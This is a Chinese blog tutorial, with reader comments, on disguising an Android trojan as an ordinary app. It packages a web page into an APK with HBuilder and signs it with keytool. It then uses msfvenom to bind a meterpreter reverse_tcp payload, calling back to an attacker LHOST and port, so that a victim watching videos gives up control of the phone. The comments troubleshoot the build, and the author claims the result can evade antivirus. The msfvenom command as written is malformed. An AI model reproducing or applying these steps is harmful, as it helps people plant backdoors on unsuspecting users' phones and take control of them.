浅谈Shell的伪装的艺术

在网络安全中，社会工程学已经是一种最为致命的攻击手段。常常让人出其不意，今天来看看如何利用 木马伪装的艺术来进行社会工程学攻击。

伪装的艺术

利用 HBuilder将web页面打包成 APP
文件-新建-移动APP
配置APP项目

需要注意是 页面入口便是APP启动后要进入的页面。

需要注意的是图标格式为 PNG

右键项目-发行-发行原生APP

关于签名
如果你不懂关于androdi的前面，建议使用公用证书。但是需要实名认证。于是我这里用了自己的证书！

在 Kali下我们利用下面命令建立证书。

keytool -genkey -alias testalias -keyalg RSA -keysize 2048 -validity 36500 -keystore kali.keystore

这样我们便创建了一个名为 kali.keystore的证书，输入证书的密码，位置等信息打包即可！

在 发行-查看APP打包状态 下载已经打包好的app

msfvenom -p -x kali.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali1.apk

参数说明：
-x 原生APP
kali1.apk 最后生成含有后门的app

就这样，当你还在不断的欣赏小视频的同时，别人就会得到你手机的权限。
运行app后获得shell

需要注意的是，由于kali的版本不同或者java版本问题的差异，在实际中你可能会遇到各种坑。但是不要放弃总会成功的！

版权属于：逍遥子大表哥

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

Last modification：December 6th, 2020 at 09:53 pm

正在沿街乞讨中……

test
July 16th, 2021 at 05:49 pm

大佬
Error: invalid payload: -x

Reply
1. 逍遥子
  July 16th, 2021 at 07:16 pm
  
  @test
  
  -x 目前好像弃用了！你可以看下这篇文章 https://blog.bbskali.cn/1805.html
  
  Reply
test
November 26th, 2020 at 12:57 pm

大佬，生生后门哪一步报错了
Using APK template: 1.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: apktool not found. If it's not in your PATH, please add it.
求指教

Reply
1. 逍遥子
  November 26th, 2020 at 08:00 pm
  
  @test
  
  apt-get install apktool
  
  Reply
GTR
November 23rd, 2020 at 06:06 pm

我就不信这样安装的时候手机不报毒？？

Reply
1. 逍遥子
  November 23rd, 2020 at 09:21 pm
  
  @GTR
  
  可以免杀哦~
  
  Reply